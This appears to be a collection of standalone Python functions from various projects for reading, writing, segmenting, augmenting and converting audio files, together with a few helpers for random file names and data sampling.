"def write_audio_to_file(audio: torch.Tensor, sample_id: str = ''):\n global FS_HZ\n assert FS_HZ is not None\n audio_extension = '.wav'\n audio_path = upload_directory + 'sample' + sample_id + audio_extension\n audio_np = audio.cpu().numpy()\n with open(audio_path, 'wb') as f:\n soundfile.write(f,\n audio_np,\n samplerate=FS_HZ)\n return audio_path", "def load_sample(filename):\n return open(os.path.join(SAMPLES, filename)).read()", "def write_audio_segment(self, data):\n cache_name = self.CACHE_FILE_NAME + str(time.time()) + '.wav'\n file = open(cache_name, \"wb\")\n file.write(data)\n file.close()\n return cache_name", "def segment_audio(filename, y_value, split='train', clf='gender'):\n\n filepath = 'recordings/recordings/' + filename + '.mp3'\n audio, sr = librosa.load(filepath, sr=16000)\n audio = normalize(audio)\n\n # Add gender label to filename for later processing\n sex = y_value\n if sex == 'female':\n filename = '{}.F'.format(filename)\n else: filename = '{}.M'.format(filename)\n\n # Segment audio file\n seg_files = segment_10s(audio, sr)\n\n for key, val in seg_files.items():\n new_name = '{}.{}'.format(filename, key)\n sf.write('data/{}/{}/{}o.wav'.format(clf, split, new_name), val, sr)", "def __newSampleFile(self):\n self.__newFileName()\n self.__sampleFile = wav.open(self.__fileName, self.OPEN_MODE)\n self.__sampleFile.setnchannels(NUM_CHANNELS)\n self.__sampleFile.setsampwidth(self.__audio.get_sample_size(self.FORMAT))\n self.__sampleFile.setframerate(FS)", "def save_sound(filename,sound,sample_freq,num_channels):\n #open a wave file in write ('w') mode, this will create the file\n file=wave.open(filename,'w')\n #set the framerate aka sample frequency\n file.setframerate(sample_freq)\n #set the number of the channels\n file.setnchannels(num_channels)\n #the size of the one sample in bytes\n file.setsampwidth(2)\n #write the actual sound to the file, notice the call to get_raw\n file.writeframesraw(sound.get_raw())\n file.close()", "def remove_file(path, save):\n if not save:\n os.remove(path)\n print \"[crawler] removing audio file...\"", "def record_audio_to_file(self, time, file_name):\n sample_width, frames = self.record_audio(time)\n wf = wave.open(file_name, 'wb')\n 
wf.setnchannels(self.channels)\n wf.setsampwidth(sample_width)\n wf.setframerate(self.rate)\n wf.writeframes(frames)\n wf.close()", "def generate_seg_file(self, filename):\n self._generate_a_seg_file(filename, self.wave[:-4])", "def save(cls, audiobook, file_name):\n os.unlink(file_name)", "def snip(filename,s,e,wout=True):\n n, data, data_dB,sr,ch=inputwav(filename)\n st=int(s*44100)\n en=int(e*44100)\n data_s=data[st:en,:]\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_snipped.wav',data_s,sr,'PCM_16')\n print('Done!')\n return data_s", "def load_wav_to_torch(self, full_path):\n data, sampling_rate = load(full_path, sr=self.sampling_rate)\n data = 0.95 * normalize(data)\n\n if self.augment:\n amplitude = np.random.uniform(low=0.3, high=1.0)\n data = data * amplitude\n\n return torch.from_numpy(data).float(), sampling_rate", "def augment_audio_with_sox(path, sample_rate, tempo, gain):\n try:\n with NamedTemporaryFile(suffix=\".wav\") as augmented_file:\n augmented_filename = augmented_file.name\n sox_augment_params = [\"tempo\", \"{:.3f}\".format(tempo), \"gain\", \"{:.3f}\".format(gain)]\n sox_params = \"sox \\\"{}\\\" -r {} -c 1 -b 16 -e si {} {} >/dev/null 2>&1\".format(path, sample_rate,\n augmented_filename,\n \" \".join(sox_augment_params))\n os.system(sox_params)\n y = load_audio(augmented_filename)\n except Exception as E:\n y = load_audio(path)\n return y", "def remove_silence_audio() -> None:\n # Read the wav file and get rate and list of data\n rate, data = scipy.io.wavfile.read('Test.wav')\n\n # Create list for data of amended wav file\n data2 = []\n\n # Loop through data of original file and add data that doesn't meed condition: values >= -10 and <= 10\n for i in range(len(data)):\n if data[i][0] >= -10 and data[i][0] <= 10:\n pass\n else:\n data2.append(data[i])\n\n # Create NumPy array from revised data\n data2 = np.asarray(data2, dtype=np.int16)\n\n # Write new data to wav file\n scipy.io.wavfile.write('Test.wav', rate, data2)\n\n return None", "def make_music_rand():\n pass", "def create_noise_data_from_original():\n # Get the noise values we'll choose from.\n noiseValues = AudioDataOriginal.query.filter(\n AudioDataOriginal.datetime >= '2017-06-14 07:26:24',\n AudioDataOriginal.datetime <= '2017-06-14 07:27:54',\n ).all()\n # Add a noise value to each record with a `processedValue`, as these are the\n # only ones used in the model generation later on.\n audioSamples = AudioDataOriginal.query.filter(\n AudioDataOriginal.datetime > '2017-06-14 07:27:54',\n AudioDataOriginal.processedValue.isnot(None)\n ).all()\n for sample in audioSamples:\n noiseRecord = random.choice(noiseValues)\n sample.noiseValue = noiseRecord.audio\n db.session.commit()", "def sample_sentences_from_file(file, fraction):\n with open(file, 'r') as f:\n lines = f.readlines()\n new_file_size = ceil(fraction*len(lines))\n rand_lines = sample(lines, new_file_size)\n new_file = file+\"_sampled-\"+str(new_file_size)+\".txt\"\n with open(new_file, 'w') as f:\n f.writelines(rand_lines)\n return new_file", "def play_audio(filename):\n os.system(AUDIOPLAYER + ' ' + filename)", "def normalize_audio(audio_path: str, output_path: str, name: str):\n sound = AudioSegment.from_file(audio_path + os.sep + name + '.wav',\n \"wav\")\n change_in_d_bfs = (-20.0) - sound.dBFS\n sound = sound.apply_gain(change_in_d_bfs)\n sound.export(output_path + os.sep + name + '.wav', format=\"wav\")", "def create_noise_dataset(cfg):\n here = os.path.dirname(__file__)\n basedir = os.path.join(here, 
cfg['data.mix_background_noise.audio_dir'])\n audio_files = find_files(basedir,\n cfg['data.mix_background_noise.audio_regexp'])\n sample_rate = cfg['data.sample_rate']\n audios = [audio.WavFile(fn, sample_rate=sample_rate)\n for fn in tqdm.tqdm(audio_files, 'Reading noise',\n ascii=bool(cfg['tqdm.ascii']))]\n segment_files = [os.path.splitext(fn)[0] + '.csv' for fn in audio_files]\n segments = [read_noise_csv(fn, sample_rate, len(wav))\n if os.path.exists(fn)\n else [(0, len(wav))]\n for fn, wav in zip(segment_files, audios)]\n return NoiseDataset(audios, segments,\n min_length=sample_rate * cfg['data.len_min'])", "def load_sound(self, filename):\n return mixer.Sound(os.path.join(\"sounds\", filename))", "def __newFileName(self):\n now = datetime.now()\n dateTimeAppend = now.strftime('%y%m%d_%H%M%S')\n self.__fileName = '{}/{}_{}.wav'.format(RECORDING,\n FILE_NAME_PREFIX, \n dateTimeAppend)", "def __call__(self, wav):\n beg_i = 0\n end_i = wav.shape[0]\n sel_noise = self.load_noise(self.sample_noise())\n if len(sel_noise) < len(wav):\n # pad noise\n P = len(wav) - len(sel_noise)\n sel_noise = np.pad(sel_noise, (0, P))\n # mode='reflect').view(-1).data.numpy()\n T = end_i - beg_i\n # TODO: not pre-loading noises from files?\n if len(sel_noise) > T:\n n_beg_i = np.random.randint(0, len(sel_noise) - T)\n else:\n n_beg_i = 0\n noise = sel_noise[n_beg_i:n_beg_i + T]\n # randomly sample the SNR level\n snr = random.choice(self.snr_levels)\n K, Ex, En = self.compute_SNR_K(wav, noise, snr)\n scaled_noise = K * noise\n if En > 0:\n noisy_wav = wav + scaled_noise\n noisy_wav = self.norm_energy(noisy_wav, Ex)\n else:\n noisy_wav = wav\n return noisy_wav", "def save(filename_audio, filename_jam, jam, strict=True, fmt=\"auto\", **kwargs):\n\n y = jam.sandbox.muda._audio[\"y\"]\n sr = jam.sandbox.muda._audio[\"sr\"]\n\n # First, dump the audio file\n psf.write(filename_audio, y, sr, **kwargs)\n\n # Then dump the jam\n jam.save(filename_jam, strict=strict, fmt=fmt)", "def _prepare_input_file(self, filename, numlines, maxvalue):\n with open(filename, 'a') as f:\n for _ in range(numlines):\n f.write(str(randrange(maxvalue)) + '\\n')\n self.filepath = f.name", "def append_random_number_to_filename(self, local_img_file):\n date = datetime.datetime.now()\n date_string = date.strftime(\"%m-%d-%Y\")\n return \"%s-glitched.%s\" % (local_img_file.split(\".\")[0], local_img_file.split(\".\")[1])", "def load_audio(path, target_fs=None):\n y, fs = sf.read(path)\n if y.ndim>1:\n y = np.mean(y, axis=1)\n if target_fs is not None and fs!=target_fs:\n #print('Resampling %d->%d...' 
%(fs, target_fs))\n y = librosa.resample(y, orig_sr=fs, target_sr=target_fs)\n fs = target_fs\n return y, fs", "def splice_audio(file_path, start, end):\n audio = AudioSegment.from_mp3(file_path)\n\n # Pull thumbnail\n tags = ID3(file_path)\n thumbnail = tags.get(\"APIC:\").data\n\n # Pull any other tags from og audio file\n tags = mediainfo(file_path).get('TAG', {})\n\n # Get start and and end paramters\n # to pull the audio splice of interest\n start = timestamp_to_milliseconds(start)\n end = timestamp_to_milliseconds(end)\n\n spliced = audio[start:end]\n spliced.export(\n file_path,\n format=\"mp3\",\n tags=tags\n )\n\n audiofile = eyed3.load(file_path)\n audiofile.tag.images.set(3, thumbnail, 'image/jpeg')\n audiofile.tag.save()", "def random_filename():\n\n return ''.join(random.choices(string.ascii_uppercase + string.digits, k=5))", "def save_audio(self, name=DEFAULT_OUT_NAME):\n print(\"Saving...\")\n wf = wave.open(name+'.wav', 'wb')\n wf.setnchannels(DEFAULT_CHANNELS)\n wf.setsampwidth(self.audio.get_sample_size(DEFAULT_FORMAT))\n wf.setframerate(DEFAULT_RATE)\n wf.writeframes(b''.join(self.frames))\n wf.close()\n print('Saved')", "def create_example(filename, sample_rate, load_audio_with_librosa):\n wav_data = tf.gfile.Open(filename, 'rb').read()\n example_list = list(\n audio_label_data_utils.process_record(\n wav_data=wav_data,\n sample_rate=sample_rate,\n ns=music_pb2.NoteSequence(),\n # decode to handle filenames with extended characters.\n example_id=six.ensure_text(filename, 'utf-8'),\n min_length=0,\n max_length=-1,\n allow_empty_notesequence=True,\n load_audio_with_librosa=load_audio_with_librosa))\n assert len(example_list) == 1\n return example_list[0].SerializeToString()", "def preprocessing(filename):\n reporting(\"Preprocessing file...\", True)\n chdir(path.dirname(filename))\n (rate, sig) = wavefile.load(path.split(filename)[1])\n signal = sig[0]\n\n duration = len(signal) / rate\n reporting(f\"Done. 
Duration={duration}\")\n return signal", "def preprocess_file(self, filename):\n rawfilename = ''\n for command in [self.mplayer_command, \n self.ffmpeg_command]:\n while True:\n rawfilename = self.random_string()\n if not os.path.exists(rawfilename):\n break\n \n if 0 != subprocess.call(\n command.format(self.SRATE, filename, rawfilename), \n stdout=open(os.devnull, 'w'),\n stderr=subprocess.STDOUT,\n shell=True):\n os.remove(rawfilename)\n rawfilename = None\n continue\n \n break # file is successfully converted\n return rawfilename", "def save_audio(ndarray, feature_name, out_path, x, y, new_labels, filename=None, sr=SR):\n # this is kind-of standard\n filename = filename or FeatureExtractor.get_file_name(x, feature_name, 'wav')\n librosa.output.write_wav(out_path / filename, ndarray, sr=sr, norm=True)\n new_labels.append([filename, y])\n print('info: {} transformed and saved!'.format(filename))\n return filename", "def test_repair_file(self):\n\n audio_path = self.converter.audio\n self.assertTrue(audio_path.endswith('.wav'))\n # Make sure it can be loaded in moviepy\n clip = AudioFileClip(audio_path)", "def save(filepath, src, sample_rate):\n # check if save directory exists\n abs_dirpath = os.path.dirname(os.path.abspath(filepath))\n if not os.path.isdir(abs_dirpath):\n raise OSError(\"Directory does not exist: {}\".format(abs_dirpath))\n # Check/Fix shape of source data\n if len(src.size()) == 1:\n # 1d tensors as assumed to be mono signals\n src.unsqueeze_(1)\n elif len(src.size()) > 2 or src.size(1) > 2:\n raise ValueError(\n \"Expected format (L x N), N = 1 or 2, but found {}\".format(src.size()))\n # check if sample_rate is an integer\n if not isinstance(sample_rate, int):\n if int(sample_rate) == sample_rate:\n sample_rate = int(sample_rate)\n else:\n raise TypeError('Sample rate should be a integer')\n # programs such as librosa normalize the signal, unnormalize if detected\n if src.min() >= -1.0 and src.max() <= 1.0:\n src = src * (1 << 31) # assuming 16-bit depth\n src = src.long()\n # save data to file\n extension = os.path.splitext(filepath)[1]\n check_input(src)\n _torch_sox.write_audio_file(filepath, src, extension[1:], sample_rate)", "def split_multiple_recordings_file(file_path, min_silence_duration=0.25, noise_threshold=150):\n print(file_path)\n rate, audio = scipy.io.wavfile.read(file_path)\n split_recordings = split_multiple_recordings(audio, min_silence_duration=min_silence_duration,\n noise_threshold=noise_threshold, sample_rate_hz=rate)\n\n if file_path.count('.') != 1:\n raise Exception('File_path must contain exactly one period, usually in extension. 
IE: /home/test.wav')\n\n for idx, recording in enumerate(split_recordings):\n print(\"spliting \" + file_path)\n new_file_path = file_path.split('.')[0] + '_' + str(idx) + \".wav\"\n scipy.io.wavfile.write(new_file_path, rate, recording)", "def save_wav(file_name, signal, fs):\n wavfile.write(file_name, fs, np.int16(signal/np.max(np.abs(signal)) * (2**(16)/2-1)))", "def setFilename(filename='dis.out',overwrite=0):\n if overwrite:\n dislin.filmod('DELETE')\n dislin.setfil(filename)", "async def filename_generator(self):\n chars = list(string.ascii_letters+string.digits)\n name = ''\n for i in range(random.randint(9, 25)):\n name += random.choice(chars)\n\n if name not in self.player['audio_files']:\n return name\n\n return await self.filename_generator()", "def load(name):\n with pyglet.resource.file(f'sounds/{name}.wav', 'rb') as f:\n return pygame.mixer.Sound(f)", "def __init__(self, secs, path, concat=True):\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + \"*.wav\")\n for file in files:\n (sr, samples) = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n\n # Keep track of the duration (in seconds) of our audio clip\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if (secs_loaded >= secs):\n break\n if not concat:\n break\n \n # We're assuming that all files use the same sampling frequency.\n # Truncate audio samples so that we end up with the duration specified.\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn(\"Found fewer than %.2f seconds of audio. \"\n \"Returning %.2f seconds of audio.\" % (secs, len(audio) / sr)) \n audio = audio[0:total_samples]\n\n self.audio = audio\n self.sampling_rate = sr", "def read_audiofile(audio_name,cutToLength):\n fs, data = wavfile.read(audio_name)\n # sa.play_buffer(audio_data, num_channels, bydeftes_per_sample,sample_rate)\n #play_obj = sa.play_buffer(data,1,2,fs)\n #play_obj.stop()\n # delete one column. 
Make mono channel\n if data.shape[1]>1:\n data = numpy.delete(data,1,1)\n #downsample if signal is broad\n if fs>24000:\n data = numpy.delete(data, numpy.s_[::2], 0)\n fs = int(fs/2)\n \n data = data[data!=0]\n data = numpy.delete(data,numpy.s_[ int(cutToLength*fs):len(data)] )\n return data", "def generate_wavplot(song_name):\n\n filepath = features[features.inferred_name.str.title() == song_name].feature_file.values[0]\n rate, wave = wavfile.read(filepath)\n mono = np.mean(wave, axis=1)\n mono.shape\n plt.figure(figsize=(20,6))\n plt.axis('off')\n plt.plot(mono[::mono.shape[0]//6000], color='white')\n plt.tight_layout;\n friendly_song_name = '_'.join(song_name.split()).lower()\n output_filepath = './static/wavplots/' + friendly_song_name + '.png'\n plt.savefig(output_filepath, bbox_inches='tight', pad_inches=0, transparent=True)\n return output_filepath", "def get_random(filename, out_file, number_of_random_seqs):\n records = Records(Extractor.extract_records(filename))\n random_seqs = records.get_random_seqs(number_of_random_seqs)\n RecordsWriter(random_seqs).write_to(out_file)", "def generate_file(name, size):\n print('=> Generating %s file' % name)\n with open(DATASET_DIR+name+DATASET_EXTENSION, 'wb+') as fout:\n fout.write(os.urandom(size))", "def save_data(self, f): \n if not self.sampling:\n self.convert_to_array()\n np.save(f, self.reads)", "def add_snippets_from_file(path, target, sample_dir, bird_index, rec_index,\n cutoff=0.25, min_snips=None, snip_length=4,\n num_jitters=None, jitter=0.25):\n rate, data = wav_to_raw(path)\n if rate != 44100:\n logging.info('Rate is not 44100 Hz (%s Hz)' % str(rate))\n raw_audio_to_jpgs(data, target, sample_dir, bird_index, rec_index,\n cutoff=cutoff,\n min_snips=min_snips,\n snip_length=snip_length,\n rate=rate,\n num_jitters=num_jitters,\n jitter=jitter)", "def fixed_test_audio(self, num_test_audio):\n test_filenames = np.random.choice(self.filepaths, num_test_audio)\n test_noisy_set = [np.load(f)[1] for f in test_filenames]\n # file names of test samples\n test_basenames = [os.path.basename(fpath) for fpath in test_filenames]\n return test_basenames, np.array(test_noisy_set).reshape(num_test_audio, 1, 16384)", "def load_audio(self):\n df = pd.read_csv(\"{dir}/iteration_{iter}.csv\".format(dir=self.directory, iter=self.iteration),\n usecols=[1, 2, 3])\n\n doa_from_file = df.iloc[0][1]\n wav_name = df.iloc[0][0]\n filename = \"{dir}/{wav_name}\".format(dir=self.directory, wav_name=wav_name)\n\n y, sr = librosa.load(filename, mono=False)\n\n y_8k = librosa.resample(y, sr, 8000)\n result_x = librosa.util.fix_length(y_8k, 8000)\n\n return result_x, doa_from_file", "def play_audio_file(self, fname=DETECT_DONG):\n ding_wav = wave.open(fname, 'rb')\n ding_data = ding_wav.readframes(ding_wav.getnframes())\n # with no_alsa_error():\n audio = pyaudio.PyAudio()\n stream_out = audio.open(\n format=audio.get_format_from_width(ding_wav.getsampwidth()),\n channels=ding_wav.getnchannels(),\n rate=ding_wav.getframerate(), input=False, output=True)\n stream_out.start_stream()\n stream_out.write(ding_data)\n time.sleep(0.2)\n stream_out.stop_stream()\n stream_out.close()\n audio.terminate()", "def add_noise(self, data):", "def add_noise(self, noise):\n if noise > 0.0:\n for key in self.counts:\n self.counts[key] *= 1.0 + noise * np.random.random_sample()", "def play(filename):\n SoundClient(blocking=True).playWave(filename)", "def _make_random_file(self, dir, num_chars=10000):\n filename = os.path.join(dir, \"f-%d\" % random.randint(1, 2**63 - 1))\n content = 
\"\".join([random.choice(\"0123456789abcdefghijklmnopqrstuvwxyz\\n\") for _ in range(num_chars)])\n with open(filename, \"w\") as f:\n f.writelines(content)\n return filename", "def gravar():\n frase = input(\"Digite a frase a ser gravada: \")\n filename = frase.replace(\" \", \"\").lower() + '.mp3'\n txt = \"{};{}\\n\".format(frase, filename)\n\n # adiciona texto ao arquivo\n with open('frases', 'a') as file:\n file.write(txt)\n\n play_async(text_to_file(frase, filename))", "def transcribe_audio_file(filename):\n url = 'https://api.nexiwave.com/SpeechIndexing/file/storage/' + USERNAME +'/recording/?authData.passwd=' + PASSWORD + '&auto-redirect=true&response=application/json'\n\n # To receive transcript in plain text, instead of html format, comment this line out (for SMS, for example)\n #url = url + '&transcriptFormat=html'\n\n\n # Ready to send:\n sys.stderr.write(\"Send audio for transcript with \" + url + \"\\n\")\n r = requests.post(url, files={'mediaFileData': open(filename,'rb')})\n data = r.json()\n transcript = data['text']\n foo = data['text']\n f = open('newf.txt', 'w')\n f.write(foo)\n f.close() \n # Perform your magic here:\n print \"Transcript for \"+filename+\"=\" + transcript", "def create_wav_file(self, ):\n\n f_out = open(self.wav_file, 'w')\n u_utt2spk = open(self.utt2spk, 'w')\n for file in glob.glob(self.wav_folder+'/*.wav'):\n base = os.path.basename(file).split('.')[0]\n # write to scp file\n f_out.write(base + '\\t' + file + '\\n')\n u_utt2spk.write(base + '\\t' + 'tts' + '\\n')", "def save_file_with_id_name(self, filename):\n file_ = filename.split(os.sep)[-1]\n extension = \".\".join(file_.split(\".\")[-1:])\n filename = str(uuid.uuid4()) + \".\" + extension\n return filename", "def play(sampler, name=\"/Users/Jxie0755/Documents/DXcodings/Learning_Python/CS_61A/week03/mario.wav\", seconds=2):\n out = open(name, \"wb\")\n out.setnchannels(1)\n out.setsampwidth(2)\n out.setframerate(frame_rate)\n t = 0\n while t < seconds * frame_rate:\n sample = sampler(t)\n out.writeframes(encode(sample))\n t = t + 1\n out.close()", "def filesample(filename):\n sampling_rate, samples = wavfile.read(filename)\n times = np.arange(len(samples)) / sampling_rate\n return samples, sampling_rate", "def load_sound(self, name):\n class NoneSound:\n def play(self): pass\n if not pygame.mixer or not pygame.mixer.get_init():\n sound = NoneSound()\n else:\n fullname = os.path.join('TeddyLevel','data', name)\n try:\n sound = pygame.mixer.Sound(fullname)\n except pygame.error, message:\n print 'Cannot load sound:', fullname\n raise SystemExit, message\n dictname = name[0:name.find('.')]\n self.dict[dictname] = sound", "def load_wav(file_name):\n fs, signal = wavfile.read(file_name)\n signal = np.float32(signal) / (2**(16)/2-1)\n return fs, signal", "def generate_random_media_filepath(extension: str):\n\tfilename = f'{_generate_random_string(30)}{extension}'\n\treturn os.path.join(get_media_directory(), filename)", "def detect_netease_music_name(file_path, dist_path, KEEP_SOURCE=True):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0\"\n }\n url_base = \"http://music.163.com/api/song/detail/?id={}&ids=[{}]\"\n\n if not os.path.exists(dist_path):\n os.mkdir(dist_path)\n\n for file_name in os.listdir(file_path):\n if not file_name.endswith(\".mp3\"):\n continue\n if not len(file_name.split(\"-\")) == 3:\n print(\n \">>>> File %s not in format <song id>-<bite rate>-<random number>.mp3\"\n % (file_name)\n )\n continue\n\n try:\n song_id = 
file_name.split(\"-\")[0]\n url_target = url_base.format(song_id, song_id)\n resp = requests.get(url_target, headers=headers)\n rr = json.loads(resp.text)\n\n tt = eyed3.load(os.path.join(file_path, file_name))\n tt.tag.title = rr[\"songs\"][0][\"name\"].replace(\"\\xa0\", \" \")\n tt.tag.artist = rr[\"songs\"][0][\"artists\"][0][\"name\"]\n tt.tag.album = rr[\"songs\"][0][\"album\"][\"name\"]\n tt.tag.album_artist = rr[\"songs\"][0][\"album\"][\"artists\"][0][\"name\"]\n print(\n \"song_id = %s, tt.tag title = %s, artist = %s, album = %s, album_artist = %s\"\n % (\n song_id,\n tt.tag.title,\n tt.tag.artist,\n tt.tag.album,\n tt.tag.album_artist,\n )\n )\n tt.tag.save()\n except UnicodeEncodeError as e:\n print(\n \">>>> UnicodeEncodeError, try again later: file_name = %s, error = %s\"\n % (file_name, str(e))\n )\n continue\n except:\n print(\">>>> Some other error happens: file_name = %s\" % (file_name))\n continue\n\n dist_name = (\n os.path.join(\n dist_path,\n \"%s - %s\"\n % (tt.tag.artist.replace(\"/\", \" \"), tt.tag.title.replace(\"/\", \" \")),\n )\n + \".mp3\"\n )\n \n if KEEP_SOURCE == True:\n shutil.copyfile(os.path.join(file_path, file_name), dist_name)\n else:\n os.rename(os.path.join(file_path, file_name), dist_name)", "def load(self, path):\n (folder, filename) = os.path.split(path)\n (name, extension) = os.path.splitext(filename)\n return Sound(name, Waveform.load(path))", "def setup_by_filename(self, filename: str):\n self.filename = filename if filename is not None else \"tmp\"\n self.save_file = mcpython.common.world.SaveFile.SaveFile(self.filename)", "def trim_sample_section(file: str,\r\n sampling_rate: Union[float, int, str]) -> str:\r\n sampling_rate = float(sampling_rate)\r\n temp = temporary_copy(file)\r\n\r\n clip_length = int((duration(file) * sampling_rate * 0.01))\r\n start = random.randint(1, int(duration(file) - clip_length))\r\n end = start + clip_length\r\n trim_video(temp, file, start, end)\r\n return temp", "def noise(self, freq: int, /) -> None:", "def remux_audio(filename, title):\n dbg(\"starting remux\")\n temp_file = filename + \".\" + str(random.randint(10000, 99999))\n os.rename(filename, temp_file)\n meta = extract_metadata(title)\n metadata = [\"title=%s\" % meta[\"title\"]]\n\n if meta[\"artist\"]:\n metadata = [\"title=%s\" % meta[\"title\"], \"-metadata\",\n \"artist=%s\" % meta[\"artist\"]]\n\n cmd = [g.muxapp, \"-y\", \"-i\", temp_file, \"-acodec\", \"copy\", \"-metadata\"]\n cmd += metadata + [\"-vn\", filename]\n dbg(cmd)\n\n try:\n with open(os.devnull, \"w\") as devnull:\n subprocess.call(cmd, stdout=devnull, stderr=subprocess.STDOUT)\n\n except OSError:\n dbg(\"Failed to remux audio using %s\", g.muxapp)\n os.rename(temp_file, filename)\n\n else:\n os.unlink(temp_file)\n dbg(\"remuxed audio file using %s\" % g.muxapp)", "def sample_representation(mode, data, noise):\n\tif mode == \"orig_syn\":\n\t\tmodel.mode = \"synth\"\n\t\tz = model.sample_start(data)\n\telif mode == \"orig_nat\":\n\t\tmodel.mode = \"natural\"\n\t\tz = model.sample_start(data)\n\telse:\n\t\tmodel.mode = mode\n\t\tz = model.sample_start(data).add(noise)\n\tsample, cc = model.sample_end(z)\n\timg = sample.view(batch_size, 1, img_size, img_size)\n\tsave_image(img.cpu(), directory + \"/\" + \"random_\" + mode + \"_\" + str(epoch) + \".png\")\n\tsample_txt = open(directory + \"/random_\" + mode + \"_cc.txt\", \"a\")\n\tsample_txt.write(str(cc))\n\tsample_txt.close()", "def loadTestSong (filename):\n testSong = {}\n #information of analysed song stored in dictionary 
testSong\n testSong[\"spectrogram\"] = STFTsignal.getSTFTofFile(filename)\n testSong[\"name\"] = filename\n return testSong", "def signalroisample(filename,obs):\n from samplingdist import readworkspace,readfile\n #f,w,obsdict,modeldict,databkgdict,datasigdict = readworkspace(filename)\n f,obsdict,modeldict,databkgdict,datasigdict = readfile(filename)\n if not obsdict.has_key(obs):\n raise RuntimeError(\"Observable '%s' not defined\" % obs)\n sd = ObservableSamplingProb(obsdict[obs])\n sd.setupmodel('bkg','negative_binomial_pdf')\n sd.setupmodel('sig','negative_binomial_sum_pdf')\n\n datasig = datasigdict['dvsig_'+obs]\n databkg = databkgdict['dvbkg_'+obs]\n sd.fitTo(datasig,'sig')\n sd.fitTo(databkg,'bkg')\n\n samplename = filename.split('_')[1]\n sd.plot(samplename,datasig,'sig',sample=samplename+'_sig')\n sd.plot(samplename,databkg,'bkg',sample=samplename+'_bkg')\n\n nfile = filename.split('_')[1]+'_bkgsig_'+obs+'_ws.root'\n sd.update('w',nfile,[datasig,databkg])", "def random_line(filename):\n return random.choice(list(open(filename)))", "def load_audio_data(file_path, config):\n pure_path = pathlib.PurePath(file_path)\n audio_seg = pydub.AudioSegment.from_file(pure_path, pure_path.suffix[1:])\n if audio_seg.frame_rate != config.sample_rate_hertz:\n raise ValueError(\"Mismatch in sample rate: expected: %d; got: %d\" % (\n config.sample_rate_hertz, audio_seg.frame_rate))\n if audio_seg.channels != config.audio_channel_count:\n raise ValueError(\n \"Mismatch in audio channel count: expected: %d; got: %d\" % (\n config.audio_channel_count, audio_seg.channels))\n samples = list(audio_seg.get_array_of_samples())\n # NOTE(cais): We currently use LINEAR16 in the stream requests regardless of\n # the original audio file format. Is it possible to avoid converting FLAC to\n # LINEAR16 during these cloud requests?\n return struct.pack('<%dh' % len(samples), *samples)", "def save_to_file(filename: str, sequence: List[Sample]):\n\n with open(get_path() + \"/sequence/\" + filename, \"ab+\") as file:\n for sample in sequence:\n pickle.dump(sample, file, pickle.HIGHEST_PROTOCOL)", "def mp4_to_mp3(filepath):\n audio_clip = AudioFileClip(filepath)\n mp3_filename = filepath[:-3] + 'mp3'\n audio_clip.write_audiofile(mp3_filename)\n os.remove(filepath)\n audio_clip.close()", "def create_mixture_csv(data_type):\n \n workspace = config.workspace\n data_dir = config.data_dir\n speech_dir = os.path.join(data_dir,'{}_speech'.format(data_type))\n noise_dir = os.path.join(data_dir,'{}_noise'.format(data_type)) \n magnification = config.magnification\n fs = config.sample_rate\n \n speech_names = [na for na in os.listdir(speech_dir) if na.lower().endswith(\".wav\")]\n noise_names = [na for na in os.listdir(noise_dir) if na.lower().endswith(\".wav\")]\n \n rs = np.random.RandomState(0)\n out_csv_path = os.path.join(workspace, \"mixture_csvs\", \"%s.csv\" % data_type)\n create_folder(os.path.dirname(out_csv_path))\n \n cnt = 0\n f = open(out_csv_path, 'w')\n f.write(\"%s\\t%s\\t%s\\t%s\\n\" % (\"speech_name\", \"noise_name\", \"noise_onset\", \"noise_offset\"))\n for speech_na in speech_names:\n # Read speech. \n speech_path = os.path.join(speech_dir, speech_na)\n (speech_audio, _) = read_audio(speech_path)\n len_speech = len(speech_audio)\n \n # For training data, mix each speech with randomly picked #magnification noises. \n if data_type == 'train':\n selected_noise_names = rs.choice(noise_names, size=magnification, replace=False)\n # For test data, mix each speech with all noises. 
\n elif data_type == 'test':\n selected_noise_names = noise_names\n else:\n raise Exception(\"data_type must be train | test!\")\n\n # Mix one speech with different noises many times. \n for noise_na in selected_noise_names:\n noise_path = os.path.join(noise_dir, noise_na)\n (noise_audio, _) = read_audio(noise_path)\n \n len_noise = len(noise_audio)\n\n if len_noise <= len_speech:\n noise_onset = 0\n nosie_offset = len_speech\n # If noise longer than speech then randomly select a segment of noise. \n else:\n noise_onset = rs.randint(0, len_noise - len_speech, size=1)[0]\n nosie_offset = noise_onset + len_speech\n \n if cnt % 100 == 0:\n print(cnt)\n \n cnt += 1\n f.write(\"%s\\t%s\\t%d\\t%d\\n\" % (speech_na, noise_na, noise_onset, nosie_offset))\n f.close()\n print(out_csv_path)\n print(\"Create %s mixture csv finished!\" % data_type)", "def record_audio_to_file_and_get_wav(self, time, file_name):\n sample_width, frames = self.record_audio(time)\n wf = wave.open(file_name, 'wb')\n wf.setnchannels(self.channels)\n wf.setsampwidth(sample_width)\n wf.setframerate(self.rate)\n wf.writeframes(frames)\n wf.close()\n return WavFile(samples=frames, sample_width=sample_width, time=time, word=file_name)", "def get_resampled_filename(filepath):\n try:\n filepath = filepath.encode('utf-8')\n except UnicodeDecodeError:\n pass\n return 'tmp_%s.flac' % md5(filepath).hexdigest()", "def load_or_generate_data(self) -> None:\n x = np.linspace(0, 10, self.n_samples).reshape(-1, 1)\n y_sin = np.sin(x * 1.5)\n noise = np.random.randn(*x.shape)\n y = (y_sin + noise).reshape(x.shape[0], 1)\n self.x, self.y = x, y", "def random_text(random_file=None):\n if random_file is None:\n random_file = os.path.join(\n os.path.dirname(os.path.dirname(__file__)), \"data\", \"random.txt\"\n )\n with open(random_file) as file_used:\n return random.choice(list(file_used))", "def _create_wave_file(self):\n is_wave_open = False\n try:\n wv = wave.open(self.audio_file_name, mode='wb')\n is_wave_open = True\n wv.setparams((1, # 1 channel (mono)\n 2, # 2 bytes per sample * 1 channel\n self.sample_rate,\n 0, # Initial number of samples.\n 'NONE',\n 'not compressed'))\n wv.writeframes(self.sample_buffer)\n except:\n print('Error creating audio file')\n if is_wave_open:\n wv.close()", 